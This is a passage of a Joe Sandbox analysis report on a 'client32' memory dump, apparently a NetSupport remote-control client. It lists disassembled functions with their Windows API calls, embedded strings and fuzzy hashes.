Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: NamedPipe$HandleState$ConnectErrorLastSleep
String ID:
API String ID: 218362120-0
Opcode ID: 9850f56a1599dc2a962c7a37a21bece10aeeb32bcd66ca553bf2f42e1ffa4245
Instruction ID: 6ee21beba1760f45e9f8cec65114d0dbea81b9e5318c91d2c7bc8e21aa276647
Opcode Fuzzy Hash: 9850f56a1599dc2a962c7a37a21bece10aeeb32bcd66ca553bf2f42e1ffa4245
Instruction Fuzzy Hash: 57018134A4121AABF701CE95CC8ABADB7ADEB09705F6080A9FE14C2180D775591087A2

Function 11021220 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11021282
IsWindowVisible.USER32(00000000), ref: 11021353
wsprintfA.USER32 ref: 11021397

Strings

%d,%d,%d,%d,%d,%d, xrefs: 11021391

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: 1cf097080c3948f11b550a0d32a02418d5136d11a7a480883b8e5da967e29876
Instruction ID: c0b1bfd60db8ea846a02fb21d77ba8b3541d272f91279fef7d752b1a32b6e992
Opcode Fuzzy Hash: 1cf097080c3948f11b550a0d32a02418d5136d11a7a480883b8e5da967e29876
Instruction Fuzzy Hash: 5B518E74700215AFD710DB68CC80FAAB7F9BF88704F508699F5599B281DA70ED45CBA1

Function 110353F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110353FF
EnumChildWindows.USER32(?,Function_00034F70), ref: 1103543C

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Part of subcall function 110336A0: IsWindow.USER32(?), ref: 110336A8
Part of subcall function 110336A0: GetWindowLongA.USER32(?,000000F0), ref: 110336BB

Strings

CltAutoLogon.cpp, xrefs: 1103540E
IsWindow(hDia), xrefs: 11035413

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
String ID: CltAutoLogon.cpp$IsWindow(hDia)
API String ID: 2743442841-2884807542
Opcode ID: 4f47a6dab0597b217eab1570d1d0e60e3f06aeaefd30661ab1b918f393bfedee
Instruction ID: 0552c7f017c3514978327315baee9e319998e0a8661fcc968f340ecf3ad08a18
Opcode Fuzzy Hash: 4f47a6dab0597b217eab1570d1d0e60e3f06aeaefd30661ab1b918f393bfedee
Instruction Fuzzy Hash: B341DFB5E207059FC324DF24D980A9BBBE4BF8031AF40846DD84A87A60EB36B544CB91

Function 110392F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11039312

Part of subcall function 1115F6F6: __getptd.LIBCMT ref: 1115F714

_strtok.LIBCMT ref: 11039393

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

; >, xrefs: 11039309, 1103938C
CLTCONN.CPP, xrefs: 11039347

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
String ID: ; >$CLTCONN.CPP
API String ID: 3120919156-788487980
Opcode ID: 42def418177b26b42b569aeb5afc63741fc081657c7277bf9c5a1f563ff1f739
Instruction ID: 37b2c76987e9bea4502ba12e7be251a42b12e1ded06819727bb841ad050c2350
Opcode Fuzzy Hash: 42def418177b26b42b569aeb5afc63741fc081657c7277bf9c5a1f563ff1f739
Instruction Fuzzy Hash: 9C210AB5F1424B6FE700CEA98C40B9E77D88F85369F544065FD589B381F6B5AD0183E2

Function 110310B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(33E68B52,00000000,00000006,33E68B52,111871DB,000000FF,?,11066248,NSMWClass,33E68B52,?,1106DBC8), ref: 110310EA
__strdup.LIBCMT ref: 11031135

Part of subcall function 11030FF0: LoadLibraryA.KERNEL32(Kernel32.dll,33E68B52,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031022
Part of subcall function 11030FF0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1117BA88,000000FF,?,110310FB), ref: 11031060
Part of subcall function 11030FF0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103106E
Part of subcall function 11030FF0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,1117BA88,000000FF,?,110310FB), ref: 11031094

Strings

NSMWClassVista, xrefs: 1103112F, 11031134, 11031158
NSMWClass, xrefs: 110310FF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
String ID: NSMWClass$NSMWClassVista
API String ID: 319803333-889775840
Opcode ID: 16325861383bed12502d69e40ac1d9735d2aa9ec081fe1656936577f3ec1fa2e
Instruction ID: 8ed169892bd05ae0f2ba101611ccc823f044e8f8029700b84612b42e89e6b33e
Opcode Fuzzy Hash: 16325861383bed12502d69e40ac1d9735d2aa9ec081fe1656936577f3ec1fa2e
Instruction Fuzzy Hash: A5210231E242859FD701CF288C407EAFBFAAB8A625F4089AADC55C7680F736D805C750

Function 110A93A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9408

Strings

..\ctl32\listview.cpp, xrefs: 110A941A
m_hWnd, xrefs: 110A941F
SysListView32, xrefs: 110A9402

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
API String ID: 716092398-3171529584
Opcode ID: 8cb23b2ccff900834f297a12d5cc3a6fd1e63f737428cf0075ef8449666e58c1
Instruction ID: 6c2e016e5f7cafaf54bb9fccc1446880b2c21c6b8d6acc3cfcab57880417475b
Opcode Fuzzy Hash: 8cb23b2ccff900834f297a12d5cc3a6fd1e63f737428cf0075ef8449666e58c1
Instruction Fuzzy Hash: 04216F79600216AFD710DF55D884F9BB7E9AF88318F10C61DF95997281DB74E980CBA0

Function 111252F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF980: InitializeCriticalSection.KERNEL32(00000010,00000000,11125331,33E68B52,00000002,76232EE0), ref: 110CF98D

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33E68B52,00000002,76232EE0), ref: 1112534A
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11125357

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112539E

Strings

.#v, xrefs: 1112530E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEvent$CriticalInitializeObjectSectionSingleWait_malloc_memsetwsprintf
String ID: .#v
API String ID: 2693919134-507759092
Opcode ID: ed873f05ad68058b59042d479b1d94525ea2bc21f04a3192d0b9d9cb1756c15c
Instruction ID: b933c8182b4421a687ced1bde098ace250f045b7ce2f9a046aa6e0e1e4914eda
Opcode Fuzzy Hash: ed873f05ad68058b59042d479b1d94525ea2bc21f04a3192d0b9d9cb1756c15c
Instruction Fuzzy Hash: A521C070A44344AAEB20CFA5CD45B9BFBE4EB04B14F20456EF916EB2C0E6B5A5008B91

Function 110633C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11063400
_strtok.LIBCMT ref: 11063430
_strtok.LIBCMT ref: 11063448

Strings

,= , xrefs: 110633FA, 11063429, 11063441

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,=
API String ID: 1675499619-2677018336
Opcode ID: 1b12eec7ab70592cd1bf4fe46c2ef7f85ce11387d77ab377107ff9bed4c203fe
Instruction ID: cb40fac0e7b83cb9375b3b08c6a6781fb662a6af548a4bc664be34caade0cf63
Opcode Fuzzy Hash: 1b12eec7ab70592cd1bf4fe46c2ef7f85ce11387d77ab377107ff9bed4c203fe
Instruction Fuzzy Hash: 3411252AE042562BEB02CA698C01BC7BBDC9F09215F808094FD5C9B341EA21F850C2E2

Function 110EB370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 110EB392

Part of subcall function 11160AE9: _xtoa@16.LIBCMT ref: 11160B09

RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCF4A), ref: 110EB3B7

Strings

Error %d setting %s to %s, xrefs: 110EB3C9
nsdevcon64.exe, xrefs: 110EB384

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Value__itow_xtoa@16
String ID: Error %d setting %s to %s$nsdevcon64.exe
API String ID: 293635345-4188669160
Opcode ID: 3c864664d07f85832d40fb38eb0c06809f33519111aef5495a04d2328cd39655
Instruction ID: 7e49bacf7cffd617bae11413a1c990bf3ed7db696da708c28156c5faf53d47b9
Opcode Fuzzy Hash: 3c864664d07f85832d40fb38eb0c06809f33519111aef5495a04d2328cd39655
Instruction Fuzzy Hash: 7C01AD75A01219AFD700CAA9DC85FEFB7EDDB49704F508159FD05E7240EA71AE04C7A0

Function 110B9110 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,0000002C,76937AA0), ref: 110B914F

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 110B913A
,, xrefs: 110B9127
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B9135

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessagePlacementProcessWindowwsprintf
String ID: ,$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1593395816-618755743
Opcode ID: 90b12467a28c6a0f8e6157611301d43bcb69129130bd089e2934aad76a47f1e8
Instruction ID: 735c0c7f0d4e9d25a16a65ccd8ec787d83e3c49daf021eb0f651fd87bbe56569
Opcode Fuzzy Hash: 90b12467a28c6a0f8e6157611301d43bcb69129130bd089e2934aad76a47f1e8
Instruction Fuzzy Hash: 2D01D678E0122DAFDB40DFB4D895FBDF3E8DF44308F0006AEEC0A5B280DA616A008785

Function 111531C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153213
UpdateWindow.USER32(?), ref: 1115323E

Strings

m_hWnd, xrefs: 111531FE, 1115322D
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 111531F9, 11153228

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InvalidateRectUpdateWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1236202516-2830328467
Opcode ID: 1d399324394d5e8c736be0c8e6295a0d86fc20da2768921cc9385601c5d9ee7d
Instruction ID: 49d8f248b53f35e74fe20d6d36c1e9477068d226d45f4b4d571155992e9f3ce8
Opcode Fuzzy Hash: 1d399324394d5e8c736be0c8e6295a0d86fc20da2768921cc9385601c5d9ee7d
Instruction Fuzzy Hash: 6701D17AA14602ABD2A1D631DC85F8AF3B4BF4532CF144D28F1A727580E630B880C795

Function 11015050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9BFD

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
